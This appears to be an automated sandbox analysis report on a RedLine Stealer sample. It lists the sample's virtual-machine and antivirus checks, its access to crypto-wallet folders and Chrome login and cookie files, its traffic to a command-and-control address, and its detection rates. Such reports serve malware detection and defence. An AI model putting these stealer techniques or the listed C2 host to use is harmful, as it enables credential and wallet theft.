                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile created: C:\Users\user\AppData\Local\Temp\tmp23A9.tmpJump to behavior
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/29@2/1
                              Source: DBAcglWJwi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: DBAcglWJwi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: DBAcglWJwi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CD00D8 push esp; ret 0_2_00CD00E2
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CD04C8 push ebx; ret 0_2_00CD04D6
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CD0439 push ecx; ret 0_2_00CD0446
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CD0575 push esi; ret 0_2_00CD057E
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CD08E0 push edi; ret 0_2_00CD08E6
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CDF8A0 push ecx; ret 0_2_00CDF8B2
                              Source: DBAcglWJwi.exeStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Uses known network protocols on non-standard ports
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exe TID: 6712Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exe TID: 6712Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00367EF8 str word ptr [edi]0_2_00367EF8
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWindow / User API: threadDelayed 4757Jump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWindow / User API: threadDelayed 3956Jump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: DBAcglWJwi.exe, 00000000.00000003.515031512.0000000005E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                              Source: DBAcglWJwi.exe, 00000000.00000003.515031512.0000000005E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareB2DDML_NWin32_VideoController4KA4E82DVideoController120060621000000.000000-00091453893display.infMSBDARFO9LONFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors_FT4O4RR
                              Source: DBAcglWJwi.exe, 00000000.00000003.515031512.0000000005E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareB2DDML_NWin32_VideoController4KA4E82DVideoController120060621000000.000000-00091453893display.infMSBDARFO9LONFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors_FT4O4RRLMEMp
                              Source: DBAcglWJwi.exe, 00000000.00000003.514842393.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareB2DDML_NWin32_VideoController4KA4E82DVideoController120060621000000.000000-00091453893display.infMSBDARFO9LONFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors_FT4O4RRl
                              Source: DBAcglWJwi.exe, 00000000.00000003.514842393.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.487333529.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.564264469.0000000000A6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Users\user\Desktop\DBAcglWJwi.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: DBAcglWJwi.exe, 00000000.00000002.564264469.0000000000A6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                              Stealing of Sensitive Information

                              barindex
                              Yara detected RedLine Stealer
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: DBAcglWJwi.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: DBAcglWJwi.exe PID: 6196, type: MEMORYSTR
                              Tries to steal Crypto Currency Wallets
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: Yara matchFile source: DBAcglWJwi.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: DBAcglWJwi.exe PID: 6196, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected RedLine Stealer
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: DBAcglWJwi.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: DBAcglWJwi.exe PID: 6196, type: MEMORYSTR

                              Mitre Att&ck Matrix

                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid Accounts221
                              Windows Management Instrumentation                              		Path Interception1
                              Process Injection                              		1
                              Masquerading                              		1
                              OS Credential Dumping                              		1
                              Query Registry                              		Remote Services1
                              Input Capture                              		Exfiltration Over Other Network Medium1
                              Encrypted Channel                              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                              Disable or Modify Tools                              		1
                              Input Capture                              		231
                              Security Software Discovery                              		Remote Desktop Protocol1
                              Archive Collected Data                              		Exfiltration Over Bluetooth11
                              Non-Standard Port                              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)241
                              Virtualization/Sandbox Evasion                              		Security Account Manager11
                              Process Discovery                              		SMB/Windows Admin Shares2
                              Data from Local System                              		Automated Exfiltration2
                              Non-Application Layer Protocol                              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                              Process Injection                              		NTDS241
                              Virtualization/Sandbox Evasion                              		Distributed Component Object ModelInput CaptureScheduled Transfer2
                              Application Layer Protocol                              		SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                              Obfuscated Files or Information                              		LSA Secrets1
                              Application Window Discovery                              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.commonRc.common1
                              Timestomp                              		Cached Domain Credentials1
                              Remote System Discovery                              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync123
                              System Information Discovery                              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              DBAcglWJwi.exe74%VirustotalBrowse
                              DBAcglWJwi.exe75%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                              DBAcglWJwi.exe100%AviraHEUR/AGEN.1234943

                              Dropped Files

                              No Antivirus matches

                              Unpacked PE Files

                              SourceDetectionScannerLabelLinkDownload
                              0.0.DBAcglWJwi.exe.360000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                              0.2.DBAcglWJwi.exe.360000.0.unpack100%AviraHEUR/AGEN.1234943Download File

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://ns.adobe.cobj0%URL Reputationsafe
                              http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                              http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                              http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                              http://tempuri.org/t_0%URL Reputationsafe
                              https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                              https://api.ip.sb/geoip0%URL Reputationsafe
                              http://tempuri.org/0%URL Reputationsafe
                              http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                              http://ns.adobe.c/g0%URL Reputationsafe
                              http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                              https://api.ip.sb4VlH0%Avira URL Cloudsafe
                              http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                              http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                              http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                              https://api.ip.sb/geoip%USERPEnvironmentROFILE0%URL Reputationsafe
                              https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                              http://185.222.58.90:17910/100%Avira URL Cloudmalware
                              http://185.222.58.90:17910100%Avira URL Cloudmalware
                              https://api.ipify.orgcookies//setti0%URL Reputationsafe
                              http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                              http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                              http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                              http://tempuri.org/00%URL Reputationsafe
                              http://tempuri.org/Endpoint/SetEnvironmenter0%Avira URL Cloudsafe
                              http://ns.ado/10%URL Reputationsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              api.ip.sb
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://185.222.58.90:17910/true
                                • Avira URL Cloud: malware
